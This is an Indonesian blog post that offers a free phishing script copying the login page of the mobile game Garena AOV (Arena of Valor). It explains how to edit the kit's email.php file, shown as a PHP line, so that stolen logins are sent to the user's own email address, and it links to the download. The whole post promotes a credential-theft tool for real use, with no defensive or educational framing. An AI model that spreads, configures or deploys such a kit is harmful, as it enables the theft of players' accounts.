WELLCOME TO MY TUTORIAL KAPTEN404 Script Phising Garena AOV Terbaru 2017 ~ KAPTEN404

Script Phising Garena AOV Terbaru 2017

 Script Phising Garena AOV Terbaru 2017 - Pada kesempatan kali ini saya akan berbagi script phising game yang baru saja rilis dan ternyata game ini telah populer, nah maka dari itu gue selaku penulis mau ngasih nih script secara gratis yuk langsung comot aja.

Tampilannya bro
Script ini buatan saya / bisa juga Newbie Tamvan 
Script ini Gratis tidak berbayar sama sekali pun , jika kalian melihat Script ini di jual Harap Hubungi Kami 

Di dalam File Script Phising AOV Terdapat sebuah file yang bernama ''email.php'' 

<?php$result = "emailkamu@yandex.com";?>

Ganti dengan email mu yang saya tandai warna Hijau di atas ini
Ingat Script ini tidak ada Logger sama sekali pun , Jika anda terkena Hack dengan Script ini
Jangan salahkan saya , karena saya hanya Share Script Ini Free

Silahkan Download Script nya di bawah ini !! 

Share:

Tidak ada komentar:

Posting Komentar

Popular Posts

Diberdayakan oleh Blogger.

Cari Blog Ini

  • ()
  • ()
Tampilkan selengkapnya

menu

kontak

Food

Recent Posts

Unordered List

  • Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
  • Aliquam tincidunt mauris eu risus.
  • Vestibulum auctor dapibus neque.

Pages